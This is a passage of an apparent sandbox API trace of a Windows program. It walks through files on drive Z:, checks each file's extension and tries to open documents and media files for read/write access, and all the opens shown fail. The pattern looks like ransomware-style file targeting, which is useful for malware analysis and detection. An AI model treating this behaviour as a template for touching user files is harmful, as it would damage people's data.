[0177.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.160] PathFindExtensionW (pszPath="Z:\\XAdhL2WimPIvd1az2SF4.avi") returned=".avi" [0177.164] CreateFileW (lpFileName="Z:\\XAdhL2WimPIvd1az2SF4.avi" (normalized: "z:\\xadhl2wimpivd1az2sf4.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.176] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13931, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f8MOguJ.mkv", cAlternateFileName="")) returned 1 [0177.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.176] PathFindExtensionW (pszPath="Z:\\f8MOguJ.mkv") returned=".mkv" [0177.180] CreateFileW (lpFileName="Z:\\f8MOguJ.mkv" (normalized: "z:\\f8moguj.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.181] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265bb779, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11953, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MvTzQbxzFuteK4.avi", cAlternateFileName="")) returned 1 [0177.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.181] PathFindExtensionW (pszPath="Z:\\MvTzQbxzFuteK4.avi") returned=".avi" [0177.185] CreateFileW (lpFileName="Z:\\MvTzQbxzFuteK4.avi" (normalized: "z:\\mvtzqbxzfutek4.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.187] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd40b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="woWNv.ods", cAlternateFileName="")) returned 1 [0177.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.187] PathFindExtensionW (pszPath="Z:\\woWNv.ods") returned=".ods" [0177.191] CreateFileW (lpFileName="Z:\\woWNv.ods" (normalized: "z:\\wownv.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.192] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17183, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0sa57fW.pptx", cAlternateFileName="")) returned 1 [0177.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.192] PathFindExtensionW (pszPath="Z:\\0sa57fW.pptx") returned=".pptx" [0177.196] CreateFileW (lpFileName="Z:\\0sa57fW.pptx" (normalized: "z:\\0sa57fw.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.197] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11e19, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O2TDqFynLaMJwyS.avi", cAlternateFileName="")) returned 1 [0177.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.197] PathFindExtensionW (pszPath="Z:\\O2TDqFynLaMJwyS.avi") returned=".avi" [0177.201] CreateFileW (lpFileName="Z:\\O2TDqFynLaMJwyS.avi" (normalized: "z:\\o2tdqfynlamjwys.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.203] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x4f21, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m2U2YlUMt.gif", cAlternateFileName="")) returned 1 [0177.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.203] PathFindExtensionW (pszPath="Z:\\m2U2YlUMt.gif") returned=".gif" [0177.207] CreateFileW (lpFileName="Z:\\m2U2YlUMt.gif" (normalized: "z:\\m2u2ylumt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.209] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10ef0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e8sPU7Zk.ots", cAlternateFileName="")) returned 1 [0177.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.209] PathFindExtensionW (pszPath="Z:\\e8sPU7Zk.ots") returned=".ots" [0177.214] CreateFileW (lpFileName="Z:\\e8sPU7Zk.ots" (normalized: "z:\\e8spu7zk.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.216] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x86e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hRvB1xDrUsAHG.flv", cAlternateFileName="")) returned 1 [0177.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.216] PathFindExtensionW (pszPath="Z:\\hRvB1xDrUsAHG.flv") returned=".flv" [0177.221] CreateFileW (lpFileName="Z:\\hRvB1xDrUsAHG.flv" (normalized: "z:\\hrvb1xdrusahg.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.223] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6047, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vnG2KifH.xlsx", cAlternateFileName="")) returned 1 [0177.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.223] PathFindExtensionW (pszPath="Z:\\vnG2KifH.xlsx") returned=".xlsx" [0177.229] CreateFileW (lpFileName="Z:\\vnG2KifH.xlsx" (normalized: "z:\\vng2kifh.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.230] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcc3e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="foUlybK2h.xlsx", cAlternateFileName="")) returned 1 [0177.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.230] PathFindExtensionW (pszPath="Z:\\foUlybK2h.xlsx") returned=".xlsx" [0177.235] CreateFileW (lpFileName="Z:\\foUlybK2h.xlsx" (normalized: "z:\\foulybk2h.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.238] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x4f93, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IZnOWmy.gif", cAlternateFileName="")) returned 1 [0177.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.238] PathFindExtensionW (pszPath="Z:\\IZnOWmy.gif") returned=".gif" [0177.243] CreateFileW (lpFileName="Z:\\IZnOWmy.gif" (normalized: "z:\\iznowmy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.245] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb8e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1FCq528Tci.avi", cAlternateFileName="")) returned 1 [0177.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.245] PathFindExtensionW (pszPath="Z:\\1FCq528Tci.avi") returned=".avi" [0177.249] CreateFileW (lpFileName="Z:\\1FCq528Tci.avi" (normalized: "z:\\1fcq528tci.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.251] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe48a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6IOKuPykR.odp", cAlternateFileName="")) returned 1 [0177.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.252] PathFindExtensionW (pszPath="Z:\\6IOKuPykR.odp") returned=".odp" [0177.256] CreateFileW (lpFileName="Z:\\6IOKuPykR.odp" (normalized: "z:\\6iokupykr.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.257] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x758d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GeC6sbZ4BP3n.rtf", cAlternateFileName="")) returned 1 [0177.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.257] PathFindExtensionW (pszPath="Z:\\GeC6sbZ4BP3n.rtf") returned=".rtf" [0177.261] CreateFileW (lpFileName="Z:\\GeC6sbZ4BP3n.rtf" (normalized: "z:\\gec6sbz4bp3n.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.264] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x904d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ICCtCDKhaB3ppqcf.pptx", cAlternateFileName="")) returned 1 [0177.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.264] PathFindExtensionW (pszPath="Z:\\ICCtCDKhaB3ppqcf.pptx") returned=".pptx" [0177.270] CreateFileW (lpFileName="Z:\\ICCtCDKhaB3ppqcf.pptx" (normalized: "z:\\icctcdkhab3ppqcf.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.272] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6825, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5IlHsHHuj.flv", cAlternateFileName="")) returned 1 [0177.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.272] PathFindExtensionW (pszPath="Z:\\5IlHsHHuj.flv") returned=".flv" [0177.278] CreateFileW (lpFileName="Z:\\5IlHsHHuj.flv" (normalized: "z:\\5ilhshhuj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.280] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x18042, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YfrMVx7qN.pdf", cAlternateFileName="")) returned 1 [0177.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.280] PathFindExtensionW (pszPath="Z:\\YfrMVx7qN.pdf") returned=".pdf" [0177.284] CreateFileW (lpFileName="Z:\\YfrMVx7qN.pdf" (normalized: "z:\\yfrmvx7qn.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.285] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17472, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9DJzkehG84l5iXYb.rtf", cAlternateFileName="")) returned 1 [0177.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.286] PathFindExtensionW (pszPath="Z:\\X9DJzkehG84l5iXYb.rtf") returned=".rtf" [0177.289] CreateFileW (lpFileName="Z:\\X9DJzkehG84l5iXYb.rtf" (normalized: "z:\\x9djzkehg84l5ixyb.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.291] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x113a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="arFxCRPaJOfVUXqGPh.pps", cAlternateFileName="")) returned 1 [0177.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.292] PathFindExtensionW (pszPath="Z:\\arFxCRPaJOfVUXqGPh.pps") returned=".pps" [0177.295] CreateFileW (lpFileName="Z:\\arFxCRPaJOfVUXqGPh.pps" (normalized: "z:\\arfxcrpajofvuxqgph.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.297] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb72e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hzFXuXTiFAk.mp4", cAlternateFileName="")) returned 1 [0177.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.297] PathFindExtensionW (pszPath="Z:\\hzFXuXTiFAk.mp4") returned=".mp4" [0177.301] CreateFileW (lpFileName="Z:\\hzFXuXTiFAk.mp4" (normalized: "z:\\hzfxuxtifak.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.303] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x86a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HQARGMXmC2WYy.pdf", cAlternateFileName="")) returned 1 [0177.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.304] PathFindExtensionW (pszPath="Z:\\HQARGMXmC2WYy.pdf") returned=".pdf" [0177.308] CreateFileW (lpFileName="Z:\\HQARGMXmC2WYy.pdf" (normalized: "z:\\hqargmxmc2wyy.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.309] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x167a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yusqqOM7hYB90.xlsx", cAlternateFileName="")) returned 1 [0177.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.309] PathFindExtensionW (pszPath="Z:\\yusqqOM7hYB90.xlsx") returned=".xlsx" [0177.313] CreateFileW (lpFileName="Z:\\yusqqOM7hYB90.xlsx" (normalized: "z:\\yusqqom7hyb90.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 